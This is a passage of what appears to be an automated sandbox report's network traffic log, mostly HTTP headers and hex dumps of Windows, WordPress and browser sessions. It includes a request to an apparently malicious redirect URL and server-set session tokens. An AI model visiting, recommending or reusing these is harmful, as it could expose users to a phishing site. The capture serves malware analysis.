                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: e9 5c 3c ff f3 ab 9b ff f3 a5 94 ff eb 68 4c ff e9 5b 3b ff e9 5b 3b ff eb 68 4c ff f3 a5 94 ff f3 ad 9d ff e9 5c 3c ff e9 58 38 ff e8 58 39 99 ff ff 00 01 00 00 00 00 ea 55 40 0c e9 58 39 bc e9 58 38 ff e9 59 39 ff ed 79 60 ff f4 ad 9e ff f5 b6 a9 ff f5 b8 ab ff f4 ad 9d ff ed 76 5c ff e9 59 39 ff e9 58 38 ff e9 58 39 bc eb 62 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d eb 59 39 98 e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 f9 e8 59 38 9a ea 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 e7 57 3a 35 e9 58 39 99 e9 58 38 db e9 58 38 f9 e9 58 38 f9 e9 58 38 d9 e9 58 39 99 ec 5b 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: \<hL[;[;hL\<X8X9U@X9X8Y9y`v\Y9X8X9b;b;Y9Y8X8X8X8X8X8X8Y8Y8U@W:5X9X8X8X8X8X9[:5
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 00 00 00 00 00 00 00 e5 5c 38 32 e8 58 38 ed e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5f 41 ff f7 c3 b8 ff fa da d3 ff ec 76 5c ff ed 7b 62 ff fe f6 f5 ff ff ff ff ff fb e3 dd ff ea 62 43 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f1 9b 88 ff fe fc fb ff ff ff ff ff f7 ca bf ff ed 79 5f ff fa da d3 ff f7 c6 bb ff e9 5f 41 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ea e8 5b 3b 38 00 00 00 00 ff 66 33 05 e8 5a 3a 9b e9 58 38 fe e9 58 38 ff e9 58 38 ff e9 5a 3a ff f2 a5 93 ff fb e0 da ff ec 74 5a ff e9 5a 3a ff f4 b0 a0 ff ff fe fe ff ff fe fd ff fd ef ed ff ef 85 6e ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f8 d1 c9 ff ff ff ff ff ff fe fe ff fc eb e7 ff eb 6d 51 ff ec 76 5c ff fa de d8 ff f2 a3 91 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 98
                                                                                                                                                                                                                                                                  Data Ascii: \82X8X8X8X8_Av\{bbCX8X8Y9y__AX8X8X8Y9[;8f3Z:X8X8X8Z:tZZ:nX8X8^?mQv\Z:X8X8X8Y9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 39 ff f2 a1 8f ff fe fd fc ff fd f2 f0 ff ec 75 5a ff fc e7 e3 ff ee 84 6c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 cf ea 59 38 9b e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 67 49 ff fb e5 e0 ff f4 b1 a3 ff fe f7 f6 ff ff ff ff ff fe f6 f4 ff ed 76 5c ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f2 a0 8e ff fe fd fc ff ff ff ff ff fb e1 db ff ea 61 43 ff e9 58 38 ff e9 58 38 ff eb 6c 4f ff fb e3 de ff ff ff ff ff fe f7 f5 ff f3 a7 97 ff fb e5 e0 ff ea 65 47 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 9f ea 5a 39 63 ea 59 38 fa e9 58 38 ff e9 58 38 ff e9 5a 3b ff f5 b4 a6 ff fd f8 f7 ff ff fe fe ff ff ff ff ff fb e2 dc ff ec 74 59 ff e9 5b 3c ff e9 5d 3d ff ec 74 59 ff f9 d7 d0 ff ff ff ff ff ff ff ff ff f7 c3 b8 ff eb 6b 4e ff e9 59 39 ff e9 5a 3a ff f3
                                                                                                                                                                                                                                                                  Data Ascii: 9uZlX8X8X8Y9Y8X8X8X8gIv\X8X8Y9aCX8X8lOeGX8X8X8X8Z9cY8X8X8Z;tY[<]=tYkNY9Z:
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 ea e9 59 38 8c e9 59 37 17 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 66 33 05 e5 57 38 32 ea 59 3a 9b ea 59 39 ea e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 fa ea 59 39 e6 e9 59 39 98 e8 5b 3b 38 ff 66 33 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 66 33 05 ef 5a 3a 1f ea 58
                                                                                                                                                                                                                                                                  Data Ascii: X8X8X8X8X8X8X8X8X8X8X8Y9Y8Y7f3W82Y:Y9Y8X8X8X8X8X8X8X8X8Y8Y9Y9[;8f3f3Z:X
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ea 55 40 0c e5 57 3a 4f e9 58 39 b0 ea 59 39 ee ea 59 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fd e9 59 38 ec ea 58 39 aa eb 58 38 4e eb 62 3b 0d ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ed 5b 37
                                                                                                                                                                                                                                                                  Data Ascii: U@W:OX9Y9Y9X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8Y8Y8X9X8Nb;[7
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 5d 46 0b e6 57 38 7b e9 59 38 ec e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3b ff ec 77 5d ff f8 cd c3 ff fc ee eb ff f7 c5 b9 ff ee 81 69 ff f2 9f 8e ff fd f0 ed ff ff ff ff ff fd f4 f2 ff f1 99 85 ff e9 5c 3d ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 64 47 ff f5 ba ac ff fe fb fb ff ff fe fe ff fc ec e8 ff f2 a5 94 ff f7 c5 bb ff fc ed e9 ff f8 cb c1 ff ec 77 5d ff e9 5b 3b ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 39 ee e7 57 39 75 d4 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 e3 5a 39 36 e9 58 38 d9 e9 59 38 fd e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 3a ff ec 73 59 ff f8 cb c1 ff fd f1 ee ff f6 be b2 ff
                                                                                                                                                                                                                                                                  Data Ascii: ]FW8{Y8X8X8X8X8X8Z;w]i\=X8X8X8X8X8dGw][;X8X8X8X8X8Y9W9uU@UUZ96X8Y8X8X8X8X8Y:sY
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: 38 ff e9 58 38 ff e9 5b 3c ff f1 9c 89 ff fc ed e9 ff f4 b4 a6 ff ea 62 43 ff e9 58 38 ff e9 59 39 ff eb 6e 52 ff f9 d8 d1 ff ff fe fe ff ff ff ff ff ff fd fd ff f9 d2 ca ff eb 6c 4f ff ea 5f 40 ff f3 a5 94 ff f7 c5 ba ff ec 6d 51 ff e9 5a 3b ff f0 8d 78 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f5 ff f3 a6 95 ff ea 61 42 ff ed 7b 62 ff fc e6 e1 ff f4 ac 9b ff ea 5f 40 ff e9 58 38 ff ea 60 42 ff f4 b3 a4 ff fb ed e9 ff f2 9d 8a ff e9 5c 3c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 f0 ec 5a 39 5e e9 59 39 98 e9 58 38 f6 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 63 45 ff f5 b9 ab ff fc ed ea ff ef 85 6f ff e9 5b 3c ff e9 58 38 ff e9 5b 3b ff f0 8e 79 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f6 ff f3 a8 98 ff ea 5f 40 ff e9
                                                                                                                                                                                                                                                                  Data Ascii: 8X8[<bCX8Y9nRlO_@mQZ;xaB{b_@X8`B\<X8X8X8X8X8Z9^Y9X8X8X8X8X8cEo[<X8[;y_@
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: ff f3 a5 94 ff fe f7 f5 ff ff ff ff ff ff ff ff ff fe f6 f4 ff f3 a5 94 ff e9 5d 3e ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff eb 6c 50 ff f8 cd c3 ff ff fc fc ff ff ff ff ff ff ff ff ff fb e4 df ff ee 81 69 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 60 41 ff f5 b3 a5 ff ff fb fb ff fa dd d7 ff ed 76 5c ff ea 60 42 ff f4 ae 9f ff fc e6 e2 ff ee 7e 65 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 f2 e9 59 39 dc e9 58 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ed 79 5f ff fa df d9 ff f7 c3 b6 ff ea 63 45 ff ea 68 4b ff f8 d0 c8 ff ff fd fd ff ff ff ff ff ff ff ff ff fc e7 e3 ff ef 85 6f ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3a ff ef 88 71 ff fb e8 e4 ff ff ff ff ff ff ff ff ff ff fe
                                                                                                                                                                                                                                                                  Data Ascii: ]>X8X8X8Y9lPiZ:X8X8X8`Av\`B~eX8X8X8X8X8Y9Y9X9X8X8X8X8y_cEhKoZ:X8X8X8Z:q
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC1369INData Raw: ea 61 43 ff eb 6b 4f ff f4 ac 9c ff f5 b7 aa ff f4 b3 a4 ff f4 aa 9b ff f4 a9 9a ff f4 aa 9a ff f4 ad 9e ff f4 b4 a6 ff f5 b4 a5 ff ee 81 6a ff e9 5a 3a ff e9 5a 3b ff f1 95 82 ff fd f0 ed ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fd fc ff fa df d9 ff ed 7a 60 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 f4 e9 5a 39 7d e3 55 39 09 ff 80 00 02 ed 5b 37 38 e9 58 38 d0 ea 58 38 fe e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f2 a1 8f ff fc eb e7 ff f7 c6 ba ff ec 74 5a ff ea 60 42 ff ea 60 42 ff ea 61 43 ff e9 5f 40 ff e9 59 39 ff e9 5a 3b ff ea 61 42 ff ea 61 43 ff ea 60 42 ff ea 5f 40 ff ea 5f 40 ff ea 5f 40 ff ea 5f 41 ff ea 61 43 ff ea 61 43 ff e9 5c 3d ff e9 58 38 ff e9 5a 3a ff f0 8d 77 ff fc e9 e6
                                                                                                                                                                                                                                                                  Data Ascii: aCkOjZ:Z;z`Z:X8X8X8X8Y8Z9}U9[78X8X8X8X8X8X8^?tZ`B`BaC_@Y9Z;aBaC`B_@_@_@_AaCaC\=X8Z:w


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  40192.168.2.1649751184.28.90.27443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                                                  2024-10-29 19:09:46 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=63903
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:45 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-CID: 2


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  41192.168.2.1649754184.28.90.27443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:46 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                  Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                                                  2024-10-29 19:09:47 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=63955
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:47 GMT
                                                                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                                                                                                  2024-10-29 19:09:47 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  42192.168.2.164975520.12.23.50443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:52 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ywH7FaLO6aH19wT&MD=noSDGOKd HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                  2024-10-29 19:09:53 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                  MS-CorrelationId: 276e270a-6a13-49c6-9714-1ffa07142321
                                                                                                                                                                                                                                                                  MS-RequestId: 942125fb-43aa-4b3e-9084-7b825dc2114a
                                                                                                                                                                                                                                                                  MS-CV: R+ETEh74aUSAubEE.0
                                                                                                                                                                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:51 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Content-Length: 24490
                                                                                                                                                                                                                                                                  2024-10-29 19:09:53 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                  2024-10-29 19:09:53 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  43192.168.2.1649757192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC676OUTGET /c.gif?u=https%3A%2F%2Fusqe.bin4tgla.com%2FfpI2Ggql%2F&r=&b=238502921&p=0&rand=0.5834010147506843 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:56 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  44192.168.2.1649756104.21.85.924437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC719OUTGET /fpI2Ggql/ HTTP/1.1
                                                                                                                                                                                                                                                                  Host: usqe.bin4tgla.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC1233INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:56 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YAgBvAz176uTZj%2BJw%2BFxg2ENAhBDk0mXVYddQcVVQHkYoPiNuyoDpJ%2FM3yVvzmzFghyP3knwhprOM298dYp7sKEKmvSX0Pd8lKwZXDivqCEJ0eCYvBhOOtXGZxsYGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=22669&sent=3077&recv=1677&lost=0&retrans=3&sent_bytes=2892550&recv_bytes=457173&delivery_rate=2957738&cwnd=247&unsent_bytes=0&cid=1b0fe8d189b179fc&ts=2688049&x=0"
                                                                                                                                                                                                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Ink5a3lvWlZtaGdPTUdzNXNWNFkrdHc9PSIsInZhbHVlIjoiRWtVK3RlVkExNXRPYkdoY3lXTjNGUGFnVHA0SjFMMXhTMzVpbzlxQ3JzbC9hV0o2a2lwOElUaGJhN2p3ZTJncjNLZ1M2NHdBazBXTUkrQU45c2FJdGNHN3RBSHJtbEZDMVRXT2dYOEVKdmVXbFFBdktPNWoyeXdwckhuaU95cHQiLCJtYWMiOiI5ZGUyMzkxNDc4NzQ2YTczYmI5YjE3ODYwMzMzMWMzNGU3MGY3ZTU2NGYxZmZlYjE4Mzg1MmUzNGY3NjY3MjE0IiwidGFnIjoiIn0%3D; expires=Tue, 29-Oct-2024 21:09:56 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                  2024-10-29 19:09:56 UTC706INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 64 4b 5a 54 46 70 61 33 41 30 52 7a 68 54 55 45 4a 4e 61 43 74 77 5a 31 5a 55 65 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 6d 35 73 55 58 56 59 56 6b 31 4e 61 32 30 30 51 57 70 6e 62 6d 64 79 53 56 4d 78 51 6b 31 48 64 45 78 4f 63 58 6c 46 64 7a 68 50 4d 46 5a 31 5a 44 42 4d 5a 44 4e 34 54 44 52 6a 61 43 39 6e 61 6e 52 57 61 56 56 52 59 6b 35 46 57 55 39 48 53 46 4a 76 57 54 42 78 64 48 5a 4b 55 7a 5a 47 52 7a 4a 43 59 6b 46 55 4f 46 56 55 4d 43 39 57 5a 58 4e 6f 54 57 46 61 5a 55 51 7a 4e 6a 6c 55 5a 30 73 35 61 32 6b 32 4f 54 59 34 54 6c 52 6c 59 54 5a 43 4f 55 78 53 61 45 45 32 52 6d 31 31 64 33 68 68 55 6b 31 61 5a 55 34
